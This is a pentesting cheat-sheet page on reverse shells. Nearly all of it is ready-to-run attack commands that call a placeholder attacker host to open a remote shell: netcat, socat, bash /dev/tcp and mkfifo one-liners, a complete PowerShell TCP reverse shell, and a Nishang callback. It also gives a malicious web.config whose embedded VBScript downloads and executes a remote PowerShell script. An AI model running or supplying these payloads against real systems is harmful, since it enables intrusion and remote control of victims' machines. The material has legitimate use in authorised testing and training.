Reverse Shell

In a reverse shell, the target machine connects to the attacker computer.

Netcat

On the attacker computer, first start a listener as follows:

attacker> $ nc -nvlp 443

On the victim shell, connect to the attacker IP device:

victim> $ nc -nv <attacker.IP> 4444 -e /bin/bash

Socat

On the attacker machine, run socat :

attacker> $ socat -d -d TCP4-LISTEN:4444 STDOUT

Then, on the victim shell, connect to the attacker IP device :

victim> $ socat TCP4:<attacker.IP>:4444 EXEC:/bin/bash

Bash

As previously, start a listener on the attacker computer.

attacker> $ nc -nvlp 443

Then, run the following bash instructions on the victim machine.

victim> $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker IP> 443 >/tmp/f

From a simple web shell, the following command can be useful:

bash -c 'bash -i >& /dev/tcp/<attacker IP>/443 0>&1'

Resource: https://www.revshells.com/

PowerShell

On the attacker machine, open a netcat listener:

attacker> $ nc -lnvp 443

Next, send a PowerShell reverse shell from the victim's computer:

C:\\Users\\victim> $client = New-Object System.Net.Sockets.TCPClient('<attacker.IP>',443);
C:\\Users\\victim> $stream = $client.GetStream();
C:\\Users\\victim> [byte[]]$bytes = 0..65535|%{0};
C:\\Users\\victim> while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
C:\\Users\\victim> {
C:\\Users\\victim>    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
C:\\Users\\victim>    $sendback = (iex $data 2>&1 | Out-String );
C:\\Users\\victim>    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush();
}
$client.Close();

The above command can also be run from a command prompt as follows:

C:\\Users\\victim> powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker.IP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Nishang

First, grab a copy of Nishang’s Invoke-PowerShellTcp.ps1. Then, add the below line at the end of the script to automatically invoke a callback:

Invoke-PowerShellTcp -Reverse -IPAddress <AttackerIp> -Port 443

Upload this file to the victim computer and execute it. Do not forget to previously start a listener on the attacker server.

Web.config

This method can be very destructive where an application already uses a web.config file that is going to be replaced with ours which might not have all the required settings such as the database connection string or some valid assembly references. It is recommended to not use this technique on live websites when an application might have used a web.config file which is going to be replaced. IIS applications that are inside other applications or virtual directories might not use a web.config file and are generally safer candidates than website’s root directory.

web.config

<?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <%@ Language=VBScript %> <% call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://<AttackerIP>/Invoke-PowerShellTcp.ps1')") %>

Note that the above content aims to download a Nishang's powershell script from the attacker server and instantly execute it on the victim device. So, it is necessary to previously start a web server and a listener corresponding to the one specified on the Nishang's script (please refer to the previous section to configure it). These both operations can respectively be done as follows:

attacker> $ python -m http.server 80

attacker> $ nc -nvlp 443

PreviousBind Shell NextTTY Shell

Last updated 2 years ago